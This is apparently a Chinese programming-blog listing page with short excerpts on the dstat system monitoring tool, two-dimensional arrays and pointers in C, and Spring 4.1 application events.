    1) 工具说明dstat是一个用来替换 vmstat,iostat netstat,nfsstat和ifstat这些命令的工具, 是一个全能系统信息统计工具. 与sysstat相比, dstat拥有一个彩色的界面, 在手动观察性能状况时, 数据比较显眼容易观察; 而且dstat支持即时刷新, 譬如输入dstat 3, 即每三秒收集一次, 但最新的数据都会每秒刷新显示. 和sysstat相同的是,
  • C 语言初级入门--二维数组和指针 1140566087 二维数组c/c++指针
    /* 二维数组的定义和二维数组元素的引用 二维数组的定义: 当数组中的每个元素带有两个下标时,称这样的数组为二维数组; (逻辑上把数组看成一个具有行和列的表格或一个矩阵); 语法: 类型名 数组名[常量表达式1][常量表达式2] 二维数组的引用: 引用二维数组元素时必须带有两个下标,引用形式如下: 例如: int a[3][4];  引用:
  • 10点睛Spring4.1-Application Event wiselyman application
    10.1 Application Event Spring使用Application Event给bean之间的消息通讯提供了手段 应按照如下部分实现bean之间的消息通讯 继承ApplicationEvent类实现自己的事件 实现继承ApplicationListener接口实现监听事件 使用ApplicationContext发布消息
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他